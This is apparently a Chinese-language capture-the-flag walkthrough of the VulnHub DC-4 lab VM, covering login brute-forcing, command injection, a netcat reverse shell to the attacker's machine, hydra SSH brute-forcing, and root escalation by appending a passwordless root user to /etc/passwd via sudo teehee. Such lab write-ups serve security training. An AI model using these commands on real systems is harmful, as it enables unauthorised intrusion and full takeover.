Vulnhub--DC-4

一，部署方法

1. 在官网上下载zip压缩包
2. 下载到本地上解压缩后使用虚拟机导入.ova后缀的文件（在过程中出现问题不用理睬，点击重试即可）
3. 配置网络，本人设置的是nat模式，这个看个人需求
4. 打开靶机即可

二，靶机地址和描述

1. 下载地址

https://download.vulnhub.com/dc/DC-4.zip

2. 靶机描述

靶机只有一个flag

三，测试

1. 信息收集

arp-scan -l

本机攻击机地址是148，192.168.237.147为靶机地址

使用nmap对靶机全面扫描

nmap -A -T4 -p- 192.168.237.147

发现靶机开了两个端口

22端口，ssh服务

80端口，http,web服务

访问192.168.237.147网站

再进行目录爆破

均无任何收获！！！

还是尝试从web页面进行深入

点击登录框发现存有用户名admin，输入密码123使用BP进行抓包查看

发现用户名和密码是以明文进行传输的。

这里尝试爆破密码，爆破出来是happy

使用用户名/密码：admin/happy，成功登录

点击Command进入

点击run

发现执行了命令，列出了当前目录下的文件

再次点击run，这时使用bp抓包

这才发现执行了命令ls -l

这里可以使用命令执行漏洞，既然可以使用命令执行漏洞，于是下一步反弹shell

2. 反弹shell

首先在kali开启监听

nc -lvvp 4444

其次在抓包页面命令执行处执行以下命令

nc -e /bin/bash 192.168.237.148 4444

查看kali的监听页面，成功监听

执行命令查看当前权限

whoami

是最低权限。

3. python执行交互性shell

执行

python -c "import pty;pty.spawn('/bin/bash')"

4.靶机内信息收集

当前得到的是最低用户，尝试进行提权操作。

这里使用命令

find / -perm -u=s -type f 2>/dev/null

查看可使用的suid的命令

并无可用文件，倒是最后一个有点意思，进行查看/home目录下

发现三个用户文件夹，进行逐一查看，发现只有在jim目录下存在文件

经过信息的寻找，在jim目录下的backups文件夹内有password文件

进行查看

把文件内的密码复制保存出来，目录下的mbox没有访问权限，而test.sh里面是一些无用的东西

信息整理：

到这掌握的信息有：靶机有三个普通用户，得到jim用户下的有一个密码字典，在前面的信息收集中得到靶机开启ssh服务，这时可以使用得到的密码字典爆破登录ssh服务，同时mbox无权限访问，有嫌疑！

4. 使用hydra爆破ssh服务

hydra -l jim -P pass.txt 192.168.237.147 ssh

成功爆破密码，使用ssh服务进行登录

ssh jim@192.168.237.147

查看用户权限,并查看mbox内容

whoami

ls

cat mbox

这里显示是root用户给jim发了一封邮件

想到在linux mail文件夹下可能会存在文件，进入/var/mail文件夹内查看

cd /var/mail

ls

查看文件

这时charles用户发给jim用户的，在其中包含了charles用户的密码

使用charles用户进行ssh登录

ssh charles@192.168.237.147

查看用户下的线索，发现并无线索，再次尝试提权

5. 提权

sudo -l

查看特权命令

发现存在root下的命令teehee

teehee --help

查看你teehee命令的使用方法

这是一个写入文件的命令

可以使用这个命令进行写入高权限的用户。

“用户名：密码：用户ID：组ID：用户说明：家目录：登陆后的shell”| 使用命令 -a 文件保存路径

echo “HK::0:0:::/bin/bash” | sudo teehee -a /etc/passwd

切换用户

su HK

查看当前用户权限

whoami

成功提权，获得最高权限

寻找flag

cd /root

ls

cat flag.txt

成功解题

四．总结

1.信息收集

2.登录框的爆破

3.命令执行漏洞

4.hydra工具的使用

5.ssh服务

6.sudo提权